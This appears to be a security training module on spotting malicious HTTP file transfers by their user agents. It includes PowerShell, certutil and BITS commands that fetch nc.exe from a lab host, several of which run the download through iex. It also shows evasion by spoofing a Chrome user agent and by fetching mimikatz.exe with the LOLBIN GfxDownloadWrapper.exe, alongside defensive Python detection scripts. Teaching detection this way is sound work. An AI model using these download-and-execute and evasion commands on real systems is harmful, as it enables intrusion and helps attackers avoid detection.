
# Detect or be Detected

### Detection

Command-line detection based on blacklisting is straightforward to bypass.

Even simple case obfuscation can break it.

Whitelisting takes longer to build, but it is far more robust.

Once a whitelist exists, unusual command lines stand out fast.

Most client-server protocols negotiate how content will be delivered before exchanging data.

HTTP works this way.

Interoperability matters across different web servers and browsers.

That is why HTTP clients identify themselves with a user agent string.

Servers use that string to identify the client, such as Firefox, Chrome, or something else entirely.

User agents are not limited to browsers.

Anything acting as an HTTP client can send one.

That includes `cURL`, custom Python scripts, `sqlmap`, and `Nmap`.

Organizations can improve detection by building a list of known legitimate user agents.

That list should include:

* normal browser user agents
* default operating system user agents
* update services such as Windows Update
* antivirus update traffic

These values can feed into a SIEM for threat hunting.

That makes it easier to filter legitimate traffic and focus on anomalies.

Suspicious user agents can then be reviewed for malicious behavior.

Useful references:

* This website is handy for identifying common user agent strings.
* A list of user agent strings is available here.

Malicious file transfers can also be detected through their user agents.

The examples below show user agents and headers observed from common HTTP transfer techniques.

The tests were run on Windows 10, version `10.0.14393`, with PowerShell `5`.

### Observed user agents and headers

#### `Invoke-WebRequest`

**Client**

```powershell
PS C:\htb> Invoke-WebRequest http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"
PS C:\htb> Invoke-RestMethod http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"
```

**Server**

```http
GET /nc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0
```

#### `WinHttpRequest`

**Client**

```powershell
PS C:\htb> $h=new-object -com WinHttp.WinHttpRequest.5.1;
PS C:\htb> $h.open('GET','http://10.10.10.32/nc.exe',$false);
PS C:\htb> $h.send();
PS C:\htb> iex $h.ResponseText
```

**Server**

```http
GET /nc.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
```

#### `Msxml2`

**Client**

```powershell
PS C:\htb> $h=New-Object -ComObject Msxml2.XMLHTTP;
PS C:\htb> $h.open('GET','http://10.10.10.32/nc.exe',$false);
PS C:\htb> $h.send();
PS C:\htb> iex $h.responseText
```

**Server**

```http
GET /nc.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)
```

#### `Certutil`

**Client**

```cmd
C:\htb> certutil -urlcache -split -f http://10.10.10.32/nc.exe
C:\htb> certutil -verifyctl -split -f http://10.10.10.32/nc.exe
```

**Server**

```http
GET /nc.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
```

#### `BITS`

**Client**

```powershell
PS C:\htb> Import-Module bitstransfer;
PS C:\htb> Start-BitsTransfer 'http://10.10.10.32/nc.exe' $env:temp\t;
PS C:\htb> $r=gc $env:temp\t;
PS C:\htb> rm $env:temp\t;
PS C:\htb> iex $r
```

**Server**

```http
HEAD /nc.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
```

This only scratches the surface of detecting malicious file transfers.

A strong starting point is to create:

* a whitelist of allowed binaries
* a blacklist of binaries commonly abused

Hunting for anomalous user agent strings is also a strong way to catch an attack in progress.

Threat hunting and detection techniques come up again in later modules.

### Evading detection

#### Changing the user agent

If defenders blacklist common user agents, `Invoke-WebRequest` gives you a `-UserAgent` parameter.

That lets you change the default value to emulate Internet Explorer, Firefox, Chrome, Opera, or Safari.

If Chrome is common in the environment, using that user agent may look more normal.

#### Listing available user agents

```powershell
PS C:\htb> [Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl
```

Example output:

```powershell
Name       : InternetExplorer
User Agent : Mozilla/5.0 (compatible; MSIE 9.0; Windows NT; Windows NT 10.0; en-US)

Name       : FireFox
User Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) Gecko/20100401 Firefox/4.0

Name       : Chrome
User Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0
             Safari/534.6

Name       : Opera
User Agent : Opera/9.70 (Windows NT; Windows NT 10.0; en-US) Presto/2.2.1

Name       : Safari
User Agent : Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0
             Safari/533.16
```

#### Request with a Chrome user agent

Use `Invoke-WebRequest` with a Chrome user agent to make the request blend in more easily.

**Client**

```powershell
PS C:\htb> $UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
PS C:\htb> Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"
```

**Server**

```bash
impale7@htb[/htb]$ nc -lvnp 80

listening on [any] 80 ...
connect to [10.10.10.32] from (UNKNOWN) [10.10.10.132] 51313
GET /nc.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6
(KHTML, Like Gecko) Chrome/7.0.500.0 Safari/534.6
Host: 10.10.10.32
Connection: Keep-Alive
```
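The spoofed request above shows why the Detection section prefers a whitelist of exact, known-good user agents over a blacklist of tool markers: the `PSUserAgent` Chrome string (`Chrome/7.0.500.0`, `AppleWebKit/534.6`) carries none of the PowerShell, WinHttp, CryptoAPI or BITS markers, yet it is not the string any real browser in the environment sends. The following Python is an added example, not code from the original page or from Hack The Box: it parses a constructed one-line access-log format, runs both approaches over the user agents captured in this page, and reports what each catches. The client IPs, the "known good" Chrome 120 string and the two update-service user agents are constructed placeholders for a hypothetical environment.

```python
"""Hunt for anomalous HTTP user agents in web access-log lines.

Added example, not code from the original page. The log format, the
client IPs and the "known good" user agents are constructed for a
hypothetical environment; the tool user agents are the ones captured
in the page's examples above.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Constructed one-line format: <client_ip> "<method> <path>" "<user-agent>"
LOG_RE = re.compile(r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" "(?P<ua>[^"]*)"$')

# Whitelist: the exact user agent strings this hypothetical environment is
# known to send (its browser build, OS update service and AV updater).
ALLOWED_USER_AGENTS = frozenset({
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    "Microsoft-Delivery-Optimization/10.0",   # constructed placeholder for an update service
    "ExampleAV-Updater/3.2",                  # constructed placeholder for AV update traffic
})

# Blacklist, for comparison: substrings of the tool user agents shown on the page.
BLACKLIST_MARKERS = (
    "WindowsPowerShell", "WinHttp.WinHttpRequest", "MSIE 7.0",
    "Microsoft-CryptoAPI", "Microsoft BITS",
)


@dataclass(frozen=True)
class Request:
    ip: str
    method: str
    path: str
    user_agent: str


def parse_log(text: str) -> list[Request]:
    """Parse log lines; lines that do not match the format are skipped."""
    requests = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            requests.append(Request(m["ip"], m["method"], m["path"], m["ua"]))
    return requests


def blacklist_hits(requests: list[Request]) -> list[Request]:
    """Requests whose user agent contains a known tool marker."""
    return [r for r in requests if any(marker in r.user_agent for marker in BLACKLIST_MARKERS)]


def whitelist_anomalies(requests: list[Request]) -> list[Request]:
    """Requests whose user agent is not an exact known-good string."""
    return [r for r in requests if r.user_agent not in ALLOWED_USER_AGENTS]


def missed_by_blacklist(requests: list[Request]) -> list[Request]:
    """Anomalies the whitelist catches but the blacklist does not."""
    hits = set(blacklist_hits(requests))
    return [r for r in whitelist_anomalies(requests) if r not in hits]


def summarize(requests: list[Request]) -> Counter:
    """Count requests per user agent, the view a SIEM hunt would pivot on."""
    return Counter(r.user_agent for r in requests)


# Constructed sample: one real browser hit, one update check, the five
# transfer-tool requests from the page, and the spoofed Chrome/7.0.500.0 request.
SAMPLE_LOG = """\
10.10.10.132 "GET /index.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
10.10.10.140 "GET /update.cab" "Microsoft-Delivery-Optimization/10.0"
10.10.10.132 "GET /nc.exe" "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0"
10.10.10.132 "GET /nc.exe" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
10.10.10.132 "GET /nc.exe" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)"
10.10.10.132 "GET /nc.exe" "Microsoft-CryptoAPI/10.0"
10.10.10.132 "HEAD /nc.exe" "Microsoft BITS/7.8"
10.10.10.132 "GET /nc.exe" "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6"
"""

if __name__ == "__main__":
    reqs = parse_log(SAMPLE_LOG)
    print(f"blacklist hits: {len(blacklist_hits(reqs))}, "
          f"whitelist anomalies: {len(whitelist_anomalies(reqs))}")
    for r in missed_by_blacklist(reqs):
        print("missed by blacklist:", r.ip, r.method, r.path, r.user_agent)
```

On the sample, the blacklist flags the five tool requests and the whitelist flags six; the one request only the whitelist catches is the spoofed Chrome string, because the whitelist compares whole strings rather than looking for tool markers. The trade-off is the one the page states: the allowed set must be kept current as browsers and updaters change versions, or legitimate traffic starts to show up as anomalies.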

### LOLBAS and GTFOBins

Application whitelisting may block PowerShell or Netcat.

Command-line logging may also alert defenders.

In that case, use a LOLBIN.

That means a living-off-the-land binary.

These are also called misplaced trust binaries.

One example is the Intel Graphics Driver binary for Windows 10, `GfxDownloadWrapper.exe`.

It exists on some systems and can download configuration files periodically.

That behavior can be abused for file transfer.

#### Transfer a file with `GfxDownloadWrapper.exe`

```powershell
PS C:\htb> GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"
```

This binary may be allowed by application whitelisting and excluded from alerting.

Other common binaries may also work.

Check the LOLBAS project for a file download binary that exists in the environment.

On Linux, the equivalent resource is GTFOBins.

It is equally worth checking.

At the time of writing, GTFOBins documents nearly 40 commonly installed binaries that can be used for file transfers.
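The command-line side of this section has the same shape as the user-agent side: a case-sensitive blacklist of tool names is trivial to slip past, a whitelist of allowed binaries makes anything else stand out, and a LOLBIN such as `GfxDownloadWrapper.exe` passes the whitelist precisely because it is expected to exist. The Python below is an added example, not code from the original page or from Hack The Box. It runs those three checks over constructed process-creation events that carry the commands shown on this page, and adds one rule a defender can layer on top of a whitelist: an allowed, download-capable binary invoked with a URL argument. The event format, the executable paths and the allowed-binary set are constructed for a hypothetical environment.

```python
"""Command-line hunting: blacklist vs. whitelist, plus a rule for allowed
binaries that can download.

Added example, not code from the original page. The event format, the
paths and the sample events are constructed; the commands are the ones
shown on the page.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # full path of the executable, as a process-creation log records it
    command_line: str   # command line as typed, case preserved


# Blacklist of tool names, matched as substrings of the command line.
BLACKLIST = ("certutil", "powershell")

# Whitelist: the executables this hypothetical environment expects to run.
ALLOWED_BINARIES = frozenset({"explorer.exe", "chrome.exe", "svchost.exe", "gfxdownloadwrapper.exe"})

# Allowed-but-download-capable binaries (LOLBAS-style): a URL on their command
# line is worth a look even though the binary itself passes the whitelist.
DOWNLOAD_CAPABLE = frozenset({"certutil.exe", "gfxdownloadwrapper.exe"})
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def binary_name(event: ProcessEvent) -> str:
    """Executable file name, case-folded, since Windows paths are case-insensitive."""
    return PureWindowsPath(event.image).name.casefold()


def naive_blacklist_hits(events: list[ProcessEvent]) -> list[ProcessEvent]:
    """Case-sensitive substring blacklist: 'CERTUTIL' slips past 'certutil'."""
    return [e for e in events if any(b in e.command_line for b in BLACKLIST)]


def normalized_blacklist_hits(events: list[ProcessEvent]) -> list[ProcessEvent]:
    """Same blacklist with case folded; still blind to binaries it never lists."""
    return [e for e in events if any(b in e.command_line.casefold() for b in BLACKLIST)]


def whitelist_anomalies(events: list[ProcessEvent]) -> list[ProcessEvent]:
    """Any process whose executable is not on the allowed list."""
    return [e for e in events if binary_name(e) not in ALLOWED_BINARIES]


def download_rule_hits(events: list[ProcessEvent]) -> list[ProcessEvent]:
    """Allowed binaries that can fetch files, invoked with a URL argument."""
    return [e for e in events
            if binary_name(e) in DOWNLOAD_CAPABLE and URL_RE.search(e.command_line)]


def hunt(events: list[ProcessEvent]) -> dict[ProcessEvent, list[str]]:
    """Union of the whitelist and download rules, with the reason for each hit."""
    hits: dict[ProcessEvent, list[str]] = {}
    for e in whitelist_anomalies(events):
        hits.setdefault(e, []).append("not on binary whitelist")
    for e in download_rule_hits(events):
        hits.setdefault(e, []).append("download-capable binary with URL argument")
    return hits


# Constructed sample events; the GfxDownloadWrapper.exe path is a placeholder.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 r'"chrome.exe" --profile-directory=Default'),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"certutil -urlcache -split -f http://10.10.10.32/nc.exe"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"CERTUTIL -urlcache -split -f http://10.10.10.32/nc.exe"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'PowerShell -c "Invoke-WebRequest http://10.10.10.32/nc.exe -OutFile C:\Users\Public\nc.exe"'),
    ProcessEvent(r"C:\Intel\GfxDownloadWrapper.exe",
                 r'GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"'),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    print("naive blacklist:", len(naive_blacklist_hits(SAMPLE_EVENTS)))
    print("case-folded blacklist:", len(normalized_blacklist_hits(SAMPLE_EVENTS)))
    for event, reasons in hunt(SAMPLE_EVENTS).items():
        print(binary_name(event), "->", "; ".join(reasons))
```

On the sample, the case-sensitive blacklist catches only the lower-case `certutil` invocation, the case-folded version catches both `certutil` lines and the PowerShell one, and neither ever sees `GfxDownloadWrapper.exe`. The whitelist flags everything that is not an expected binary, and the URL rule is what brings the allowed LOLBIN back into view; together they produce four hits with a reason attached to each, which is the form a SIEM alert should take.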
